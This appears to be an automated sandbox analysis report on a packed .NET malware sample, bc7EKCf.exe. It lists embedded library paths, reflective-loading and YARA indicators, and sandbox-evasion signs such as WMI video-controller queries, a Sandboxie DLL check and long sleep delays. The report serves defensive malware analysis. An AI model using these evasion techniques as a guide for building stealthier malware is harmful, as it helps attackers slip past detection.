                Source: Binary string: /_/artifacts/obj/System.IO.Pipelines/Release/net462/System.IO.Pipelines.pdbSHA256 source: bc7EKCf.exe, 00000002.00000002.2012775385.0000000008B00000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Text.Encodings.Web/Release/net462/System.Text.Encodings.Web.pdbSHA256 source: bc7EKCf.exe, 00000002.00000002.2009256026.0000000007FB0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: bc7EKCf.exe, 00000002.00000002.2005165287.00000000077A0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: ntkrnlmp.pdb source: Temp.txt.2.dr
                Source: Binary string: ntkrnlmp.pdb\ source: Temp.txt.2.dr
                Source: Binary string: /_/src/Nito.Disposables/obj/Release/net461/Nito.Disposables.pdbSHA256N source: bc7EKCf.exe, 00000002.00000002.1995301685.00000000056E0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: costura.costura.pdb.compressed source: bc7EKCf.exe, 00000000.00000002.1799849511.0000000004AE9000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.1976480263.00000000030F1000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed/icsharpcode.sharpziplib]costura.icsharpcode.sharpziplib.dll.compressed;microsoft.bcl.asyncinterfacesicostura.microsoft.bcl.asyncinterfaces.dll.compressed+microsoft.data.sqliteYcostura.microsoft.data.sqlite.dll.compressed9microsoft.web.infrastructuregcostura.microsoft.web.infrastructure.dll.compressed source: bc7EKCf.exe, 00000000.00000002.1799849511.0000000004AE9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Buffers/Release/net462/System.Buffers.pdbSHA256W source: bc7EKCf.exe, 00000002.00000002.2009530198.0000000007FD0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Memory/Release/net462/System.Memory.pdb source: bc7EKCf.exe, 00000002.00000002.2010903453.00000000081EB000.00000004.00000020.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.1985383738.0000000004119000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.1976480263.00000000036D2000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.2008008650.0000000007C10000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: /_/src/Nito.Disposables/obj/Release/net461/Nito.Disposables.pdb source: bc7EKCf.exe, 00000002.00000002.1995301685.00000000056E0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: /_/src/Nito.AsyncEx.Context/obj/Release/net461/Nito.AsyncEx.Context.pdbSHA256 source: bc7EKCf.exe, 00000002.00000002.1976369045.00000000030B0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.Unsafe\Release\net462\System.Runtime.CompilerServices.Unsafe.pdb source: bc7EKCf.exe, 00000002.00000002.2008803844.0000000007E50000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/Release/net462/Microsoft.Bcl.AsyncInterfaces.pdbSHA256 source: bc7EKCf.exe, 00000002.00000002.2010931634.0000000008420000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: /_/src/Nito.AsyncEx.Tasks/obj/Release/net461/Nito.AsyncEx.Tasks.pdbSHA256 source: bc7EKCf.exe, 00000002.00000002.1976402820.00000000030C0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: /_/src/Nito.AsyncEx.Tasks/obj/Release/net461/Nito.AsyncEx.Tasks.pdb source: bc7EKCf.exe, 00000002.00000002.1976402820.00000000030C0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: /_/src/Nito.AsyncEx.Context/obj/Release/net461/Nito.AsyncEx.Context.pdb source: bc7EKCf.exe, 00000002.00000002.1976369045.00000000030B0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.Unsafe\Release\net462\System.Runtime.CompilerServices.Unsafe.pdbBSJB source: bc7EKCf.exe, 00000002.00000002.2008803844.0000000007E50000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: winload_prod.pdb\ source: Temp.txt.2.dr
                Source: Binary string: /_/artifacts/obj/System.Text.Json/Release/net462/System.Text.Json.pdb source: bc7EKCf.exe, 00000002.00000002.1976480263.000000000368C000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.2011473460.0000000008A10000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Text.Encodings.Web/Release/net462/System.Text.Encodings.Web.pdb source: bc7EKCf.exe, 00000002.00000002.2009256026.0000000007FB0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Buffers/Release/net462/System.Buffers.pdb source: bc7EKCf.exe, 00000002.00000002.2009530198.0000000007FD0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Text.Json/Release/net462/System.Text.Json.pdbSHA256 source: bc7EKCf.exe, 00000002.00000002.1976480263.000000000368C000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.2011473460.0000000008A10000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: prod.pdb\*/i source: bc7EKCf.exe, 00000002.00000002.1996132099.0000000005D51000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Threading.Tasks.Extensions\netfx\System.Threading.Tasks.Extensions.pdb source: bc7EKCf.exe, 00000002.00000002.1976480263.000000000368C000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.2007888532.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.1976480263.00000000036D2000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/Release/net462/Microsoft.Bcl.AsyncInterfaces.pdb source: bc7EKCf.exe, 00000002.00000002.2010931634.0000000008420000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|806F4C19B2D7FD9E3B836269EC07647019A29E95|7960 source: bc7EKCf.exe, 00000000.00000002.1799849511.0000000004AE9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.IO.Pipelines/Release/net462/System.IO.Pipelines.pdb source: bc7EKCf.exe, 00000002.00000002.2012775385.0000000008B00000.00000004.08000000.00040000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: bc7EKCf.exe, jvjhbtqNwINKVmnJKTrYCRxEXfVBvwuzkdkPpbr.cs.Net Code: jtoShBUniXDMNLQBtCfsrIMOGfumXFHcFJXhCQDp System.Reflection.Assembly.Load(byte[])
                Source: 0.2.bc7EKCf.exe.4ce1eb0.3.raw.unpack, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                Source: 2.2.bc7EKCf.exe.77a0000.14.raw.unpack, DynamicUtils.cs.Net Code: CreateSharpArgumentInfoArray
                Source: 2.2.bc7EKCf.exe.77a0000.14.raw.unpack, LateBoundReflectionDelegateFactory.cs.Net Code: CreateDefaultConstructor
                Source: Yara matchFile source: 0.2.bc7EKCf.exe.4ce1eb0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.bc7EKCf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.bc7EKCf.exe.4ce1eb0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1799849511.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1799849511.0000000004AE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1976480263.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1967670466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1819411564.00000000094C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: bc7EKCf.exe PID: 7272, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: bc7EKCf.exe PID: 7536, type: MEMORYSTR
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 0_2_02F7EF02 pushfd ; retf 0_2_02F7EF05
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 0_2_02F7F2F0 pushad ; iretd 0_2_02F7F2F1
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 0_2_07C33C83 push esi; ret 0_2_07C33C85
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 0_2_07C33C87 push esi; ret 0_2_07C33C89
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 0_2_07C33C8B push esi; ret 0_2_07C33C8D
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 0_2_07C33C8F push esi; ret 0_2_07C33C91
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 0_2_07C33C93 push esi; ret 0_2_07C33C95
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 0_2_07C33C97 push esi; ret 0_2_07C33C99
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 0_2_07C33C9B push esi; ret 0_2_07C33C9D
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 0_2_07C33C77 push esi; ret 0_2_07C33C79
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 0_2_07C33C7B push esi; ret 0_2_07C33C7D
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 0_2_07C33C7F push esi; ret 0_2_07C33C81
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_0159BBCD push ss; retf 2_2_0159BBD2
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_07640B28 pushfd ; retf 2_2_07640B29
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_07640AC8 pushad ; retf 2_2_07640AC9
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_07640ACA push esp; retf 2_2_07640AD1
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_07958D0F pushfd ; ret 2_2_07958EE1
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_07958D0F push eax; retf 0793h2_2_07958F71
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_07958FF8 pushad ; iretd 2_2_07959061
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_07958F78 push eax; retf 2_2_07958F81
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_07954340 pushfd ; retf 2_2_07954341
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_0796F62C push ebp; iretd 2_2_0796F638
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_0796526D push es; ret 2_2_07965270
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_0796E1AC push eax; iretd 2_2_0796E1AD
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_08B3FA51 push es; ret 2_2_08B3FA60
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_08B3D357 pushad ; retf 2_2_08B3D365
                Source: C:\Users\user\Desktop\bc7EKCf.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                Source: bc7EKCf.exe, 00000000.00000002.1756488186.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000000.00000002.1756488186.000000000359A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\bc7EKCf.exeMemory allocated: 2F10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeMemory allocated: 30E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeMemory allocated: 50E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeMemory allocated: 94C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeMemory allocated: A4C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeMemory allocated: 1550000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeMemory allocated: 30F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeMemory allocated: 50F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeWindow / User API: threadDelayed 6703Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeWindow / User API: threadDelayed 2858Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7292Thread sleep time: -922337203685477s >= -30000sJump to behavior
